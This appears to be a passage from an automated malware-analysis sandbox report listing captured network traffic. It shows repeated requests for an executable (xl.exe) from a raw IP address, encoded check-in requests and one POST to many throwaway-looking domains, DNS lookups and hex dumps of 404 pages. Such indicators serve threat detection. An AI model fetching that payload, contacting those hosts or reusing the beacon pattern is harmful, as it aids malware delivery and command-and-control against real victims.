    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /dashboard/xl.exe HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
    Host: 45.200.148.45
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    GET /dashboard/xl.exe HTTP/1.1
    Host: 45.200.148.45
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0cyyooyzOVigyhm4upFaEQ5FVDL9IYlN2EnnOtWol53ChrSdq3Cue46r4D6qSkCmEW9rZbuVVo= HTTP/1.1
    Host: www.tenmyk.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /fhx4/?9B_ppt=La2w8Dit9+06W6UDzOpyWaSJwhDt0En/zF10s3Y0GLWWp3W5XYBJe4ay5kbJYoMqdVQ5UuPTPFY7LReVYSqnXR+zSVGbwszjyZbrKje2k/1r3Ly4XgGf/cA=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
    Host: www.tlcatlas.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /i7vz/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=Uo31g2cBlJ7Y51X9qiyWPllw2i3mGNMb8MW7X7OuPhPba7zW9vHCK1/tPALhEq4c3dLOMnOYn0E6ZXOZtUsElcj8T2RWijJqpTgaIG46XXD/8sezv8KfXnc= HTTP/1.1
    Host: www.xphone.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /r67x/?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYztsjxkrAaNpZX0l6jkYi+VfuO97QxGNgBCFFWLt6B6VM0bCruEmjStFMTCnvezkXJEF9Ro0QfaPDcmWgUP4M=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
    Host: www.basicreviews.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /3qlo/?9B_ppt=T329z6mTpDO/RjmIsaX6GxS+fVaV1tgKwTndei0jE2s03jQmQlLR7HOZ8ZNHnRQMcrtNhio3hbZStuVrccVySYYypr0GxKLOZ6Y8dZz+3cHpxqLj7fYKvSQ=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.stationseek.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /tycs/?9B_ppt=JnL2shJTRGPmh49fpIgYgN5+UFlzCIkQlKFRWx+imQO/VZY5IL7EOXQuybzppj9USUhCNE2Oi8OvmQ7twQzrLnOW74Dzktiy3u2kYAFK0p92dbQcp3RrNNk=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.solarand.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /er88/?9B_ppt=i44cfvhGA8d2n3UYXaCGfuZ18OIgEphd3DXa+grkxbY00W8PtxsyWNCcnvl5XmwHEQha9wDhby9/6Haw/gmAEUgIq47tXTEuO1ZaxpFdonJQgsoz6uRXQGU=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.030002059.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global traffic | DNS traffic detected: DNS query: www.idsmart.online
                Source: global traffic | DNS traffic detected: DNS query: www.sortcouponspot.shop
                Source: global traffic | DNS traffic detected: DNS query: www.030002128.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.quicktraze.website
                Source: global traffic | DNS traffic detected: DNS query: www.tenmyk.shop
                Source: global traffic | DNS traffic detected: DNS query: www.tlcatlas.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.xphone.net
                Source: global traffic | DNS traffic detected: DNS query: www.basicreviews.online
                Source: global traffic | DNS traffic detected: DNS query: www.89180.app
                Source: global traffic | DNS traffic detected: DNS query: www.stationseek.online
                Source: global traffic | DNS traffic detected: DNS query: www.solarand.online
                Source: global traffic | DNS traffic detected: DNS query: www.030002059.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.salju777-rtp.click
                Source: global traffic | DNS traffic detected: DNS query: www.tdassetmgt.info
                Source: unknown | HTTP traffic detected: POST /90oi/ HTTP/1.1
                    Host: www.sortcouponspot.shop
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Encoding: gzip, deflate
                    Accept-Language: en-us
                    Origin: http://www.sortcouponspot.shop
                    Cache-Control: no-cache
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Referer: http://www.sortcouponspot.shop/90oi/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                    Data Raw: 39 42 5f 70 70 74 3d 62 66 75 52 74 77 54 74 50 53 7a 46 71 48 50 68 4c 70 57 6c 65 54 64 51 4f 5a 6a 43 57 34 42 4f 49 78 39 4f 63 52 73 63 6a 35 61 63 36 69 4c 33 4a 32 49 58 4e 51 59 51 53 4b 73 69 72 68 54 31 42 37 57 44 32 4f 5a 42 78 38 72 6e 49 46 4a 74 6d 78 31 38 57 6d 6e 32 75 78 76 71 6f 4f 4c 49 30 45 5a 72 36 48 36 5a 47 62 6b 61 64 51 44 4c 7a 5a 71 69 56 4c 78 4e 66 39 4a 75 74 43 6a 4f 6f 50 30 72 75 74 48 32 57 7a 4d 41 63 51 57 59 73 4a 79 34 58 47 69 74 76 7a 42 57 50 4e 51 54 57 64 56 34 78 7a 6e 63 33 76 30 30 58 54 68 32 6c 4d 79 4b 36 55 70 71 30 50 35 59 62 53 6d 6b 30 77 3d 3d
                    Data Ascii: 9B_ppt=bfuRtwTtPSzFqHPhLpWleTdQOZjCW4BOIx9OcRscj5ac6iL3J2IXNQYQSKsirhT1B7WD2OZBx8rnIFJtmx18Wmn2uxvqoOLI0EZr6H6ZGbkadQDLzZqiVLxNf9JutCjOoP0rutH2WzMAcQWYsJy4XGitvzBWPNQTWdV4xznc3v00XTh2lMyK6Upq0P5YbSmk0w==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 
3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 